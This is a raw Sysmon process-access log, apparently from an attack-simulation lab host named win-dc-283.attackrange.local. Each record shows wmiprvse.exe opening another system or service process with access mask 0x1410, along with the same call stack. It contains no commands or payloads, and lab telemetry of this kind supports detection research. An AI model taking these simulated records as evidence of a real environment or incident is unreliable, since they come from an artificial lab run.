15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024332Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024331Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024330Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024329Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024328Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024327Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024326Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024325Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024324Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024323Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024322Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024321Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024320Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024319Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024318Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024317Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024316Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024315Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024314Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024313Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 